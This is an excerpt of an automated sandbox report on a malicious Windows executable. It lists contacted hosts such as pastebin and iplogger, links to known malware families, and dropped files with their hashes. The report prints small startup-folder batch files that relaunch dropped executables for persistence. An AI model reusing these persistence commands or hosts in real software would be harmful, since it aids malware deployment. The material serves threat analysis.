                          http://purl.oclc.org/ooxml/officeDocument/relationships/htmlPubSaveAsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/themeOverridefile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/diagramLayoutfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/webSettingsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://iplogger.org/rules/InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/calcChainfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/volatileDependenciesfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/metadata/thumbnailfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/transformfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/externalLinkPathfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/glossaryDocumentfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://datamarket.accesscontrol.windows.net/v2/OAuth2-13Chttps://api.datamarket.azure.com/#PowerPivfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/mailMergeHeaderSourcefile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.mhoInstallUtil.exe, 00000008.00000002.4056738976.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://pastebin.comInstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/tableSingleCellsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://pastebin.comInstallUtil.exe, 00000008.00000002.4058787437.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B11000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/slideUpdateInfofile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://datamarket.azure.com/embedded/catalog?client_id=file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          104.20.4.235
                          		pastebin.comUnited States
                          		13335CLOUDFLARENETUStrue
                          172.67.19.24
                          		unknownUnited States
                          		13335CLOUDFLARENETUSfalse
                          188.114.96.3
                          		yip.suEuropean Union
                          		13335CLOUDFLARENETUSfalse
                          104.21.76.57
                          		iplogger.comUnited States
                          		13335CLOUDFLARENETUSfalse

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1510394
                          Start date and time:2024-09-12 21:56:51 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 14s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:17
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winEXE@19/8@4/4
                          EGA Information:
                          • Successful, ratio: 50%
                          HCA Information:
                          • Successful, ratio: 97%
                          • Number of executed functions: 152
                          • Number of non-executed functions: 27
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240s for sample files taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target InstallUtil.exe, PID 6060 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: file.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          16:01:13API Interceptor7x Sleep call for process: file.exe modified
                          16:01:17API Interceptor17850x Sleep call for process: InstallUtil.exe modified
                          22:01:21AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cQXYrsQOJ3uDVcsTMDpcKVmy.bat
                          22:01:34AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JnikXG7VSGx0qVwm8oVPQ6yD.bat
                          22:01:42AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rp6RLsI5LmL2C04PREj94eun.bat
                          22:01:55AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\19S9Dp4fmqvJxlR4ciWynHCd.bat
                          22:02:03AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5atHPpWR9QsMT9LuXihO59Nk.bat
                          22:02:11AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Og39QxfIE2g9AUE6E1dsQSTl.bat

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          104.20.4.235envifa.vbsGet hashmaliciousRemcosBrowse
                          • pastebin.com/raw/V9y5Q5vv
                          New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Update on Payment.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          172.67.19.24sostener.vbsGet hashmaliciousRemcosBrowse
                          • pastebin.com/raw/V9y5Q5vv
                          Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          188.114.96.3Purchase order.exeGet hashmaliciousFormBookBrowse
                          • www.1win-moldovia.fun/kslt/
                          Comprobante.PDF867564575869708776565434576897.exeGet hashmaliciousLokibotBrowse
                          • touxzw.ir/sweetwhore/five/fre.php
                          r9856_7.exeGet hashmaliciousFormBookBrowse
                          • www.chinaen.org/x5bi/
                          DistinctiveCarpets#92161.pdfGet hashmaliciousHTMLPhisherBrowse
                          • uyvi.jjscommunitysupport.online/favicon.ico
                          Remittance advice.exeGet hashmaliciousFormBookBrowse
                          • www.x0x9x8x8x7x6.shop/assb/
                          PO#940894.exeGet hashmaliciousAzorult, GuLoaderBrowse
                          • vlha.shop/LP341/index.php
                          Opgaveforlb.exeGet hashmaliciousAzorult, GuLoaderBrowse
                          • d4hk.shop/DL341/index.php
                          OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                          • lysyvan.com/login.php
                          5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                          • lysyvan.com/login.php
                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                          • lysyvan.com/login.php

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          yip.sufile.exeGet hashmaliciousDarkTortillaBrowse
                          • 188.114.97.3
                          jFzg3KFP48.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          BsMXrWBfhT.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          BsMXrWBfhT.exeGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                          • 188.114.97.3
                          3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                          • 188.114.96.3
                          Setup3.exeGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          file.exeGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          pastebin.comfile.exeGet hashmaliciousDarkTortillaBrowse
                          • 104.20.3.235
                          file.exeGet hashmaliciousMicroClip, RedLineBrowse
                          • 104.20.3.235
                          RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                          • 104.20.4.235
                          66dcad8f5f33a_crypted.exeGet hashmaliciousMicroClip, RedLineBrowse
                          • 104.20.4.235
                          SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                          • 104.20.3.235
                          IMKssbDprn.exeGet hashmaliciousUnknownBrowse
                          • 104.20.4.235
                          AMERICAN GROUP.jsGet hashmaliciousRemcosBrowse
                          • 104.20.4.235
                          1.exeGet hashmaliciousMicroClipBrowse
                          • 172.67.19.24
                          Server.exeGet hashmaliciousUnknownBrowse
                          • 104.20.4.235
                          invoice.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                          • 172.67.19.24
                          iplogger.comfile.exeGet hashmaliciousDarkTortillaBrowse
                          • 104.21.76.57
                          Setup3.exeGet hashmaliciousUnknownBrowse
                          • 104.21.76.57
                          file.exeGet hashmaliciousUnknownBrowse
                          • 104.21.76.57
                          SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exeGet hashmaliciousDarkTortillaBrowse
                          • 172.67.188.178
                          file.exeGet hashmaliciousDarkTortillaBrowse
                          • 172.67.188.178
                          yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                          • 172.67.188.178
                          Arc453466701.msiGet hashmaliciousUnknownBrowse
                          • 104.21.76.57
                          Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                          • 104.21.76.57
                          Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                          • 104.21.76.57
                          Arch0000000000.msiGet hashmaliciousMetamorfoBrowse
                          • 104.21.76.57

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSdoc_inv_09-12#965.pdfGet hashmaliciousUnknownBrowse
                          • 104.21.50.11
                          https://s.whatshelp.io/r/6urdde.2=IwZXh0bgNhZW0CMTAAAR29YoTDviQIFN4D8AxWxH3S4Q1IKrR1vI6ynOpTQnPIVv1m3TCBMfIqF4w_aem_MhvSJRdz--cUJDvs-s1ruAGet hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          ProductSpecificationRequirement10092024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.96.3
                          http://ct08tv.congressreport.com/t/2252921/154514925/643861/2/?3e076d18=amhpbGxAbWFzZWN1cml0aWVzLmNvbQ%3d%3d&e5e2987d=MjI1MjkyMQ%3d%3d&x=84a69e84Get hashmaliciousUnknownBrowse
                          • 172.67.208.91
                          http://mkvy.croftanix.com/aaEPO/Get hashmaliciousHTMLPhisherBrowse
                          • 172.67.190.237
                          Shipping doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                          • 104.26.12.205
                          Play_VM-Now(Vincent.morrissey)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          https://dodgeoptify.com/Get hashmaliciousUnknownBrowse
                          • 104.16.117.116
                          CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          http://hitbrosent.com/new/review/Dkx4NItiuK6qQVIcsb7yvXvQ/ZGhpbG1lckByb3dtYXJrLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          CLOUDFLARENETUSdoc_inv_09-12#965.pdfGet hashmaliciousUnknownBrowse
                          • 104.21.50.11
                          https://s.whatshelp.io/r/6urdde.2=IwZXh0bgNhZW0CMTAAAR29YoTDviQIFN4D8AxWxH3S4Q1IKrR1vI6ynOpTQnPIVv1m3TCBMfIqF4w_aem_MhvSJRdz--cUJDvs-s1ruAGet hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          ProductSpecificationRequirement10092024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.96.3
                          http://ct08tv.congressreport.com/t/2252921/154514925/643861/2/?3e076d18=amhpbGxAbWFzZWN1cml0aWVzLmNvbQ%3d%3d&e5e2987d=MjI1MjkyMQ%3d%3d&x=84a69e84Get hashmaliciousUnknownBrowse
                          • 172.67.208.91
                          http://mkvy.croftanix.com/aaEPO/Get hashmaliciousHTMLPhisherBrowse
                          • 172.67.190.237
                          Shipping doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                          • 104.26.12.205
                          Play_VM-Now(Vincent.morrissey)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          https://dodgeoptify.com/Get hashmaliciousUnknownBrowse
                          • 104.16.117.116
                          CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          http://hitbrosent.com/new/review/Dkx4NItiuK6qQVIcsb7yvXvQ/ZGhpbG1lckByb3dtYXJrLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          CLOUDFLARENETUSdoc_inv_09-12#965.pdfGet hashmaliciousUnknownBrowse
                          • 104.21.50.11
                          https://s.whatshelp.io/r/6urdde.2=IwZXh0bgNhZW0CMTAAAR29YoTDviQIFN4D8AxWxH3S4Q1IKrR1vI6ynOpTQnPIVv1m3TCBMfIqF4w_aem_MhvSJRdz--cUJDvs-s1ruAGet hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          ProductSpecificationRequirement10092024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.96.3
                          http://ct08tv.congressreport.com/t/2252921/154514925/643861/2/?3e076d18=amhpbGxAbWFzZWN1cml0aWVzLmNvbQ%3d%3d&e5e2987d=MjI1MjkyMQ%3d%3d&x=84a69e84Get hashmaliciousUnknownBrowse
                          • 172.67.208.91
                          http://mkvy.croftanix.com/aaEPO/Get hashmaliciousHTMLPhisherBrowse
                          • 172.67.190.237
                          Shipping doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                          • 104.26.12.205
                          Play_VM-Now(Vincent.morrissey)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          https://dodgeoptify.com/Get hashmaliciousUnknownBrowse
                          • 104.16.117.116
                          CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          http://hitbrosent.com/new/review/Dkx4NItiuK6qQVIcsb7yvXvQ/ZGhpbG1lckByb3dtYXJrLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          CLOUDFLARENETUSdoc_inv_09-12#965.pdfGet hashmaliciousUnknownBrowse
                          • 104.21.50.11
                          https://s.whatshelp.io/r/6urdde.2=IwZXh0bgNhZW0CMTAAAR29YoTDviQIFN4D8AxWxH3S4Q1IKrR1vI6ynOpTQnPIVv1m3TCBMfIqF4w_aem_MhvSJRdz--cUJDvs-s1ruAGet hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          ProductSpecificationRequirement10092024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.96.3
                          http://ct08tv.congressreport.com/t/2252921/154514925/643861/2/?3e076d18=amhpbGxAbWFzZWN1cml0aWVzLmNvbQ%3d%3d&e5e2987d=MjI1MjkyMQ%3d%3d&x=84a69e84Get hashmaliciousUnknownBrowse
                          • 172.67.208.91
                          http://mkvy.croftanix.com/aaEPO/Get hashmaliciousHTMLPhisherBrowse
                          • 172.67.190.237
                          Shipping doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                          • 104.26.12.205
                          Play_VM-Now(Vincent.morrissey)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          https://dodgeoptify.com/Get hashmaliciousUnknownBrowse
                          • 104.16.117.116
                          CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          http://hitbrosent.com/new/review/Dkx4NItiuK6qQVIcsb7yvXvQ/ZGhpbG1lckByb3dtYXJrLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0eProductSpecificationRequirement10092024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 104.20.4.235
                          • 188.114.96.3
                          • 104.21.76.57
                          http://ct08tv.congressreport.com/t/2252921/154514925/643861/2/?3e076d18=amhpbGxAbWFzZWN1cml0aWVzLmNvbQ%3d%3d&e5e2987d=MjI1MjkyMQ%3d%3d&x=84a69e84Get hashmaliciousUnknownBrowse
                          • 104.20.4.235
                          • 188.114.96.3
                          • 104.21.76.57
                          Hb_Xe-000876765.exeGet hashmaliciousUnknownBrowse
                          • 104.20.4.235
                          • 188.114.96.3
                          • 104.21.76.57
                          DO-008899828B.exeGet hashmaliciousUnknownBrowse
                          • 104.20.4.235
                          • 188.114.96.3
                          • 104.21.76.57
                          Faktura_7122128240#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          • 104.20.4.235
                          • 188.114.96.3
                          • 104.21.76.57
                          Shipping doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                          • 104.20.4.235
                          • 188.114.96.3
                          • 104.21.76.57
                          PO-Xe038498884.exeGet hashmaliciousUnknownBrowse
                          • 104.20.4.235
                          • 188.114.96.3
                          • 104.21.76.57
                          Hb_Xe-000876765.exeGet hashmaliciousUnknownBrowse
                          • 104.20.4.235
                          • 188.114.96.3
                          • 104.21.76.57
                          DO-008899828B.exeGet hashmaliciousUnknownBrowse
                          • 104.20.4.235
                          • 188.114.96.3
                          • 104.21.76.57
                          PO-Xe038498884.exeGet hashmaliciousUnknownBrowse
                          • 104.20.4.235
                          • 188.114.96.3
                          • 104.21.76.57

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                          Download File
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.34331486778365
                          Encrypted:false
                          SSDEEP:24:MLU84qpE4KlKDE4KhKiKhIE4Kx1qE4qXKIE4oKNzKoZAE4Kze0E4j:Mgv2HKlYHKh3oIHKx1qHitHo6hAHKzea
                          MD5:FB53815DEEC334028DBDE4E3660E26D0
                          SHA1:7F491359EC244406DFC8AA39FC9B727D677E4FDF
                          SHA-256:C3EC8D6C079B1940D82374A85E9DC41ED9FF683ADA338F89E375AA7AC777749D
                          SHA-512:5CC466901D7911BE1E1731162CC01C371444AAFA9A504F1F22516F60C888048EB78B5C5A12215EE2B127BD67A19677E370686465E85E08BC14015F8FAB049E49
                          Malicious:true
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                          C:\Users\user\AppData\Local\NJKs7fKGojOSP1M6T2T4RfuD.exe

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                          Category:dropped
                          Size (bytes):7462
                          Entropy (8bit):5.420482116403958
                          Encrypted:false
                          SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                          MD5:77F762F953163D7639DFF697104E1470
                          SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                          SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                          SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                          Malicious:false
                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

                          C:\Users\user\AppData\Local\ervnd6hdsvGTxZRjT5cWwm7U.exe

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                          Category:dropped
                          Size (bytes):7462
                          Entropy (8bit):5.420482116403958
                          Encrypted:false
                          SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                          MD5:77F762F953163D7639DFF697104E1470
                          SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                          SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                          SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                          Malicious:false
                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rp6RLsI5LmL2C04PREj94eun.bat

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):70
                          Entropy (8bit):5.0561485101054835
                          Encrypted:false
                          SSDEEP:3:Ljn9m1CHyg4E2J5rUy8nOqkm:fE1CHhJ23QLkm
                          MD5:325039D81BC5984517094E302560E8B1
                          SHA1:23524B147210B198A2D31A6BA0897BFD37F39724
                          SHA-256:F4EBD95A4015D9909B49804A5B49830165D8351151062A44BD1B0C102DD2C897
                          SHA-512:137704F704EC1A4120A0560774B183EAFBA2BB3ADAF24A704B222428CF6D4C38022079DA42486FF4FC910CE6A743048B6854384AEA1D988316EA8699A5041B0E
                          Malicious:true
                          Preview:start "" "C:\Users\user\AppData\Local\NJKs7fKGojOSP1M6T2T4RfuD.exe"

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cQXYrsQOJ3uDVcsTMDpcKVmy.bat

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):70
                          Entropy (8bit):4.929652039073008
                          Encrypted:false
                          SSDEEP:3:Ljn9m1CHyg4E2J5ARH//xE4m:fE1CHhJ23Apa4m
                          MD5:F351EC9CB408F6CFD3E9DF7CF938978A
                          SHA1:12343E246E341FBBFCAE0F6F5483CBCD504001B2
